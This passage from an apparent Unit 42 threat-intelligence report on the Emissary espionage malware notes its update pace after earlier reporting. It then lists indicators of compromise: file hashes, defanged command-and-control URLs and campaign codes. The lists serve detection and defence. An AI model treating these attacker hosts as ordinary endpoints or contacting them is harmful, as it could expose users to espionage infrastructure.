**legitimate.** **The use of Emissary appears to be focused only on Taiwan and Hong Kong, with regular malware** **updates to avoid detection and to increase the odds of success. Of particular note, there is an** **interesting coincidence between the timing of the publication of our Operation Lotus Blossom report** **and a flurry of Emissary updates. The first occurred ten days after publication and was followed by�** **updates over increasingly shorter time frames, starting at roughly every three months and** **progressing to monthly by the final version discussed here. Until that publication, according to our�** **research Emissary was updated roughly every two years. This indicates the threat actors may take** **note of threat intelligence reporting and are fully capable of making immediate changes when** **deemed necessary.** **In addition to the malware evolution the actors also shifted from solely spear-phishing targets with** ----- **future espionage related attacks.** **[We have updated the Emissary tag for Palo Alto Networks AutoFocus users to track this threat](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Emissary)** **using the indicators discussed in this blog.** #### Emissary Delivery Documents **42b8898c07374b1fc6a4a33441aadf10e47f226d9d3bf3368a459c0e221dff73�** **37f752f89b0384291af23542efc08c01be962c04e3b2c881a8bc1f8771e9179f** **52b7f93bd4c2d1b1818f2a9506551852e2e7b511c9298e71edb54a39f69f94f2** **5cda2251059c34f55ac23941b56e248b9a1111e98f62c5a307eadbb9618592dd** **70097adba2743653bc73d0a2909a13f2904dbbcc1ffdb4e9013a8e61866abf5c�** **9bb0288f7b98fac909ed91ec24dad0d5a31e3eec93a1641849d9dab56c23aa59** **b201c89fd7bdfc625bacfd4850feaa81269d9b41ed10ba1f7c0cb1339f4a6abe** **ddbe42fb03bf9f4b9144396e814f13cd7054dcf238234dcb838fa9643136c03a** **e67d3cc1684c789c3bd02af7a68b783fd90dc6d2d660b174d533f4c0e07490f9** **0c550fad82f2653bc13d9629357a2a56df82602ee0ce96aa5a31f885e3aa29df** **f36b7f63f46ae6afe8882b34c1ec11597c8537a3a7fa8b6521a83308940cc77b** #### Emissary Installers/Loaders **fdcd10a2c2bf802ba5b6be55c16c0bf407bcbee902b66466b0f954d2951fad2d** **da29b647411153b49cbf4df862e3f36209eafb8ebe8b966429edec4fb15dbce9** **721676d529a0c439594502f1d53fec697adc80fa1301d2bf20c2600d99ceed4e** **0069029ee4029df88f700da335a06e0e3a534a94552fe966186166b526a20b6a** **9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab** **26e2f4f9026f19156a73ffbfde438916f24d80b8812b6cebe98167eb9be0863c�** **8e3b7dc3dca92d7458265e2bcd69caa558cbbf24bbbf1200b9aa924260c42480** **e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b** **02831316a3a04c1248605f28fb08d810230dd4411b2a1fc8187508aea6b449c5** **675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc** **70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629** **925d2f960d8db0510f3681c038311c0c2df86c5ba03f8cb61e3c8846c31bd6e1** **98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0** **a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8** **b07fbb92484fd2aff6d28f0ab04d5f51e96420b6d670f921b0bbe0e5392da408�** **c72b07f2a423abc4fc45dfddc5162b8eb1ea97d5b5e66811526433f09b6cdf41** **dd8ffb9f961299f7cc9cb51e17a5cccf79b7fb583e594b05ef93b54c8cad54f6�** ----- #### Emissary DLL Version 1.0 through 5.4 **a7d07b92e48876e2195e5d8769a47cf0a237e11ac304e41b14fc36042b0d9484** **e6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30** **931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb** **5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099** **9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3** **dcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3�** **5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58** **70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a** **c145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634** **375190cc8e0e75cf771d66347ea2a04b6d1b59bf2f56823eb81270618f133e2d** **e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538�** **29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051** **46ad72811990c1937d26e1f80ec1b9def8c112817f4bb9f94e3d1e4f0fb86f80** **bfceccdd553c7e26006bb044ea6d87e597c7cce08218068e31dc940e9f55b636** **731cd2ce87f4c4375782de0686b5b16619f8fa2de188522cbc8e64f8851bb7ed** **acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9** #### Emissary C2 URLs **http://101.55.121[.]79/lightserver/Default.aspx** **http://101.55.33[.]92/default.aspx** **http://101.55.33[.]92:80/default.aspx** **http://101.55.33[.]95:80/default.aspx** **http://103.243.24[.]179/Default.aspx** **http://118.193.221[.]233:80/default.aspx** **http://123.1.159[.]153/lightserver/Default.aspx** **http://123.1.159[.]210/lightserver/Default.aspx** **http://140.131.39[.]11/icanxp/help/help/default.aspx** **http://163.20.127[.]27/0test/test/default.aspx** **http://203.124.14[.]214/default.aspx** **http://203.124.14[.]229/default.aspx** **http://210.209.121[.]31/lightserver/default.aspx** **http://210.209.121[.]92/lightserver/Default.aspx** **http://210.209.121[.]92/weboffice/Default.aspx�** **http://appletree.onthenetas[.]com/Default.aspx** **http://bluefield.byinter[.]net/lightserver/Default.aspx�** **http://booking.passinggas[.]net/lightserver/Default.aspx** **http://chairman.OnTheNetAs[.]com/weboffice/Default.aspx�** **http://dnt5b.myfw[.]us/Default.aspx** **http://dnt5b.myfw[.]us/default.aspx** ----- **http://groupspace.findhere[.]org/lightserver/Default.aspx�** **http://photograph.myfw[.]us/lightserver/default.aspx** **http://ustar5.PassAs[.]us/Default.aspx** **http://ustar5.PassAs[.]us/default.aspx** **http://webonline.OnTheNetAs[.]com/lightserver/default.aspx** **http://www.danangqt[.]net:80/default.aspx** **http://zooboo.PassingGas[.]net/weboffice/Default.aspx�** #### Emissary Campaign Codes **3test** **FJ201508** **lyk_WW** **A-1117a** **QPR-Z0330** **YUIO** **ZGP-M** **xman** **A-1117a** **Flash** **FJ20151125** **YUIO** **ll** **A-1231a** **ux-2011** **RT101212** **111** **UPG-ZHG-01** **IC00001** #### Got something to say? **Leave a comment...** **Notify me of followup comments via e-** **mail** **Name (required)** ----- **Website** **SUBMIT** **SUBSCRIBE TO NEWSLETTERS** **Email** **COMPANY** **[Company](https://www.paloaltonetworks.com/company)** **[Careers](https://www.paloaltonetworks.com/company/careers)** **[Sitemap](https://www.paloaltonetworks.com/sitemap)** **[Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)** **LEGAL NOTICES** **[Privacy Policy](https://www.paloaltonetworks.com/legal-notices/privacy)** **[Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)** **ACCOUNT** **[Manage Subscription](https://www.paloaltonetworks.com/company/subscriptions)** **© 2016 Palo Alto Networks, Inc. All rights reserved.** **Email** **[TAKE A TEST DRIVE](http://connect.paloaltonetworks.com/virtual-utd)** **SUBSCRIBE** -----